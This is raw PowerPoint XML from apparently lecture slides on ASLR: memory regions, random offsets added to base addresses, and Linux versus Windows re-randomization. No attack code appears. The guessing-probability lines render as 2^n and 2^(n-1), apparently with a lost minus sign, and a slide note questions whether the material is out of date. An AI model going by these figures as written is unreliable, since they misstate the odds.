              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uninitialized data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Initialized data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3448050" y="2828925"/>
            <a:ext cx="2495550" cy="3205163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E47932"/>
          </a:solidFill>
          <a:ln w="28575" cmpd="sng">
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mapped</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thread stacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shared Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6049963" y="2830513"/>
            <a:ext cx="2495550" cy="3205162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E47932"/>
          </a:solidFill>
          <a:ln w="28575" cmpd="sng">
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="274320">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Main stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Left Brace 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1863583" y="1284289"/>
            <a:ext cx="423863" cy="2420938"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="8E280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11" name="Left Brace 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4510739" y="1283354"/>
            <a:ext cx="423863" cy="2422808"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="8E280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12" name="Left Brace 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7111064" y="1283354"/>
            <a:ext cx="423863" cy="2422808"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="8E280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20489" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1008555" y="1882775"/>
            <a:ext cx="21339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dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Base address a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20490" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3651103" y="1882775"/>
            <a:ext cx="21431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dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Base address b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20491" name="TextBox 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6267809" y="1882775"/>
            <a:ext cx="21103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dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Base address c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1243674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5975" y="1744663"/>
            <a:ext cx="7789863" cy="584200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFF0A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506" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ASLR Randomization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21514" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="816536" y="1852613"/>
            <a:ext cx="26124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dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>+ 16 bit rand r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="-25000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21515" name="TextBox 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="1854200"/>
            <a:ext cx="26306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dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>+ 16 bit rand r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="-25000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21516" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="1835150"/>
            <a:ext cx="25978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dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>+ 24 bit rand r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="-25000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Left Brace 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1863583" y="1284289"/>
            <a:ext cx="423863" cy="2420938"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="8E280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15" name="Left Brace 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4510739" y="1283354"/>
            <a:ext cx="423863" cy="2422808"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="8E280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16" name="Left Brace 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7111064" y="1283354"/>
            <a:ext cx="423863" cy="2422808"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="8E280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20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="815975" y="2827338"/>
            <a:ext cx="2495550" cy="3205162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E47932"/>
          </a:solidFill>
          <a:ln w="28575" cmpd="sng">
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uninitialized data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Initialized data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3448050" y="2828925"/>
            <a:ext cx="2495550" cy="3205163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E47932"/>
          </a:solidFill>
          <a:ln w="28575" cmpd="sng">
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mapped</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thread stacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shared Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6049963" y="2830513"/>
            <a:ext cx="2495550" cy="3205162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E47932"/>
          </a:solidFill>
          <a:ln w="28575" cmpd="sng">
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="274320">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Main stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279400" y="6308209"/>
            <a:ext cx="7659043" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>*  ≈ 16 bit random number of 32-bit system. More on 64-bit systems.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3871295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sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1661095"/>
            <a:ext cx="4038600" cy="2850011"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Typically re-randomizes at exec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Given n bits of randomness, guessing succeeds with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>prob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="30000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="2553494" y="3161506"/>
            <a:ext cx="3886200" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="5715000"/>
            <a:ext cx="7620000" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Re-Randomization gives (only)1 bit of extra security!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="1661095"/>
            <a:ext cx="4038600" cy="2850011"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Typically re-randomizes at boot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Given n bits of randomness, guessing succeeds with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>prob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>n-1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="30000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9448800" y="1828800"/>
            <a:ext cx="2438400" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This is out of date, right?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
